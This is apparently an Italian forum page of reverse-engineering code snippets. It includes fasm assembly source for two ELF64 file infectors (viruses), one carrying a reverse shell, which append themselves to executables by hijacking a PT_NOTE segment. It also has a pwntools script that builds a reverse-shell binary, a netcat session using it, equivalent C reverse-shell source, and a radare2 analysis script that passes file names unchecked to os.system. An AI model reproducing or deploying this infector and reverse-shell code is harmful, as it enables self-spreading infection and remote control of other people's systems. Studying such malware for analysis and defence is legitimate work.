-
CheckListenPorts - HCF
#!/bin/bash
netstat -lntp | grep tcp | awk '{print $4}' | awk -F":" '{print $2}' > listaporteaperte.txt
for k in `cat listaporteaperte.txt`
do sudo ss -tulpn | grep $k
done -
BPA ELF infector Reverse Shell - bash
;BPAinfectorRS.asm
;fasm BPAinfectorRS.asm
;Stack buffer:
;r15 + 0 = stack buffer (10000 bytes) = stat
;r15 + 48 = stat.st_size
;r15 + 144 = ehdr
;r15 + 148 = ehdr.class
;r15 + 152 = ehdr.pad
;r15 + 168 = ehdr.entry
;r15 + 176 = ehdr.phoff
;r15 + 198 = ehdr.phentsize
;r15 + 200 = ehdr.phnum
;r15 + 208 = phdr = phdr.type
;r15 + 212 = phdr.flags
;r15 + 216 = phdr.offset
;r15 + 224 = phdr.vaddr
;r15 + 232 = phdr.paddr
;r15 + 240 = phdr.filesz
;r15 + 248 = phdr.memsz
;r15 + 256 = phdr.align
;r15 + 300 = jmp rel
;r15 + 3000 = first run control flag
;r15 + 3001 = payload
format ELF64 executable 3
SYS_EXIT = 60
SYS_OPEN = 2
SYS_CLOSE = 3
SYS_WRITE = 1
SYS_READ = 0
SYS_EXECVE = 59
SYS_GETDENTS64 = 217
SYS_FSTAT = 5
SYS_LSEEK = 8
SYS_PREAD64 = 17
SYS_PWRITE64 = 18
SYS_SYNC = 162
STDOUT = 1
EHDR_SIZE = 64
ELFCLASS64 = 2
O_RDONLY = 0
O_RDWR = 2
SEEK_END = 2
MFD_CLOEXEC = 1
DT_REG = 8
PT_LOAD = 1
PT_NOTE = 4
PF_X = 1
PF_R = 4
FIRST_RUN = 1
V_SIZE = 1054
segment readable executable
entry v_start
v_start:
mov r14, [rsp + 8]
mov r10, [rsp + 16]
push rdx
push rsp
sub rsp, 5000
mov r15, rsp
check_first_run:
mov rdi, r14
mov rsi, O_RDONLY
xor rdx, rdx
mov rax, SYS_OPEN
syscall
mov rdi, rax
mov rsi, r15
mov rax, SYS_FSTAT
syscall
cmp qword [r15 + 48], V_SIZE
jg .open_target_file
mov byte [r15 + 3000], FIRST_RUN
.open_target_file:
mov rdi, r10
mov rsi, O_RDWR
xor rdx, rdx
mov rax, SYS_OPEN
syscall
cmp rax, 0
jbe .continue
mov r9, rax
.read_ehdr:
mov rdi, r9
lea rsi, [r15 + 144]
mov rdx, EHDR_SIZE
mov r10, 0
mov rax, SYS_PREAD64
syscall
.is_elf:
cmp dword [r15 + 144], 0x464c457f
jnz .close_file
.is_64:
cmp byte [r15 + 148], ELFCLASS64
jne .close_file
.is_infected:
cmp dword [r15 + 152], 0x00415042
jz .close_file
mov r8, [r15 + 176]
xor rbx, rbx
xor r14, r14
.loop_phdr:
mov rdi, r9
lea rsi, [r15 + 208]
mov dx, word [r15 + 198]
mov r10, r8
mov rax, SYS_PREAD64
syscall
cmp byte [r15 + 208], PT_NOTE
jz .infect
inc rbx
cmp bx, word [r15 + 200]
jge .close_file
add r8w, word [r15 + 198]
jnz .loop_phdr
.infect:
.get_target_phdr_file_offset:
mov ax, bx
mov dx, word [r15 + 198]
imul dx
mov r14w, ax
add r14, [r15 + 176]
.file_info:
mov rdi, r9
mov rsi, r15
mov rax, SYS_FSTAT
syscall
.append_virus:
mov rdi, r9
mov rsi, 0
mov rdx, SEEK_END
mov rax, SYS_LSEEK
syscall
push rax
call .delta
.delta:
pop rbp
sub rbp, .delt...BPA ELF Infector - bash
;BPAinfector.asm
;fasm BPAinfector.asm
;Stack buffer:
;r15 + 0 = stack buffer (10000 bytes) = stat
;r15 + 48 = stat.st_size
;r15 + 144 = ehdr
;r15 + 148 = ehdr.class
;r15 + 152 = ehdr.pad
;r15 + 168 = ehdr.entry
;r15 + 176 = ehdr.phoff
;r15 + 198 = ehdr.phentsize
;r15 + 200 = ehdr.phnum
;r15 + 208 = phdr = phdr.type
;r15 + 212 = phdr.flags
;r15 + 216 = phdr.offset
;r15 + 224 = phdr.vaddr
;r15 + 232 = phdr.paddr
;r15 + 240 = phdr.filesz
;r15 + 248 = phdr.memsz
;r15 + 256 = phdr.align
;r15 + 300 = jmp rel
;r15 + 3000 = first run control flag
;r15 + 3001 = payload
format ELF64 executable 3
SYS_EXIT = 60
SYS_OPEN = 2
SYS_CLOSE = 3
SYS_WRITE = 1
SYS_READ = 0
SYS_EXECVE = 59
SYS_GETDENTS64 = 217
SYS_FSTAT = 5
SYS_LSEEK = 8
SYS_PREAD64 = 17
SYS_PWRITE64 = 18
SYS_SYNC = 162
STDOUT = 1
EHDR_SIZE = 64
ELFCLASS64 = 2
O_RDONLY = 0
O_RDWR = 2
SEEK_END = 2
MFD_CLOEXEC = 1
DT_REG = 8
PT_LOAD = 1
PT_NOTE = 4
PF_X = 1
PF_R = 4
FIRST_RUN = 1
V_SIZE = 944
segment readable executable
entry v_start
v_start:
mov r14, [rsp + 8]
mov r10, [rsp + 16]
push rdx
push rsp
sub rsp, 5000
mov r15, rsp
check_first_run:
mov rdi, r14
mov rsi, O_RDONLY
xor rdx, rdx
mov rax, SYS_OPEN
syscall
mov rdi, rax
mov rsi, r15
mov rax, SYS_FSTAT
syscall
cmp qword [r15 + 48], V_SIZE
jg .open_target_file
mov byte [r15 + 3000], FIRST_RUN
.open_target_file:
mov rdi, r10
mov rsi, O_RDWR
xor rdx, rdx
mov rax, SYS_OPEN
syscall
cmp rax, 0
jbe .continue
mov r9, rax
.read_ehdr:
mov rdi, r9
lea rsi, [r15 + 144]
mov rdx, EHDR_SIZE
mov r10, 0
mov rax, SYS_PREAD64
syscall
.is_elf:
cmp dword [r15 + 144], 0x464c457f
jnz .close_file
.is_64:
cmp byte [r15 + 148], ELFCLASS64
jne .close_file
.is_infected:
cmp dword [r15 + 152], 0x00415042
jz .close_file
mov r8, [r15 + 176]
xor rbx, rbx
xor r14, r14
.loop_phdr:
mov rdi, r9
lea rsi, [r15 + 208]
mov dx, word [r15 + 198]
mov r10, r8
mov rax, SYS_PREAD64
syscall
cmp byte [r15 + 208], PT_NOTE
jz .infect
inc rbx
cmp bx, word [r15 + 200]
jge .close_file
add r8w, word [r15 + 198]
jnz .loop_phdr
.infect:
.get_target_phdr_file_offset:
mov ax, bx
mov dx, word [r15 + 198]
imul dx
mov r14w, ax
add r14, [r15 + 176]
.file_info:
mov rdi, r9
mov rsi, r15
mov rax, SYS_FSTAT
syscall
.append_virus:
mov rdi, r9
mov rsi, 0
mov rdx, SEEK_END
mov rax, SYS_LSEEK
syscall
push rax
call .delta
.delta:
pop rbp
sub rbp, .delta
...REVERSE SHELL - bash
#!/usr/bin/python3
import os, random, subprocess, string
from pwn import *
ipaddr = '127.0.0.1'
port = 31337
outfile = 'connectback'
context(arch='x86_64')
code = shellcraft.socket(network='ipv4', proto='tcp')
code += shellcraft.connect(ipaddr, port, network='ipv4')
code += shellcraft.dup2('rbp', 0)
code += shellcraft.dup2('rbp', 1)
code += shellcraft.dup2('rbp', 2)
code += shellcraft.sh()
elf = ELF.from_assembly(code)
elf.save('lnxmw1')
;piccolo malware elf creato con python e con la libreria pwntools./lnxmw1.py
[*] '/tmp/pwn-asm-02ut4aj4/step3'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0xffff000)
RWX: Has RWX segments./lnxmw1
nc -l 31337
whoami
re
ls -lrt
total 20
-rwxrwxr-x 1 re re 794 Apr 12 09:28 restatic.py
-rw-rw-r-- 1 re re 70 Apr 12 10:29 gamma.sh
-rwxrwxr-x 1 re re 447 Apr 12 16:07 lnxmw1.py
-rwxrwxr-x 1 re re 4784 Apr 12 16:07 lnxmw1
;esecuzione del malware con server netcat in ascolto sulla porta 31773; il malware crea una reverse shell nel server in ascolto#include <stdio.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <unistd.h>
int main () {
// attacker IP address
const char* ip = "127.0.0.1";
// address struct
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444);
inet_aton(ip, &addr.sin_addr);
// socket syscall
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
// connect syscall
connect(sockfd, (struct sockadr *)&addr, sizeof(addr));
for (int i = 0; i < 3; i++) {
// dup2(sockftd, 0) - stdin
// dup2(sockfd, 1) - stdout
// dup2(sockfd, 2) - stderr
dup2(sockfd, i);
}
// execve syscall
execve("/bin/sh", NULL, NULL);
return 0;
}
;codice equivalente in C
Edited by AKIRA BASHO - 2/5/2023, 17:00restatic.py - bash
#!/usr/bin/python3
import r2pipe
import sys
import os
import subprocess, re
if len(sys.argv) < 2:
sys.exit("Error: Please provide exactly one filename as argument")
program_name = sys.argv[0]
filename = sys.argv[1]
if len(sys.argv) < 3:
func="main"
else:
func=sys.argv[2]
r2 = r2pipe.open(filename)
r2.cmd('aaa')
os.system("file "+filename)
print(" ")
os.system("checksec --file "+filename)
print(" ")
print("*** list functions ***")
print(" ")
print(r2.cmd("afl"))
print("*** disassemble "+func+" ***")
print(r2.cmd("s "+func))
print(r2.cmd("pdf"))
print("*** summary "+func+" ***")
print(" ")
print(r2.cmd("pdfs"))
print("*** list strings ***")
print(" ")
print(r2.cmd("iz"))
print("*** list call instructions everywhere ***")
print(" ")
print(r2.cmd("/ad/ call"))
r2.quit()
;script python per una prima analisi statica dell'eseguibile, che utilizza la libreria python r2pipe per comunicare con radare2 e quindi estrarre tutta una serie di informazioni utili per il reversing
Reply
Create your blog! · Create your forum! · Top Blog · Categories · Help ·
Status · Contacts · Powered by BlogFree
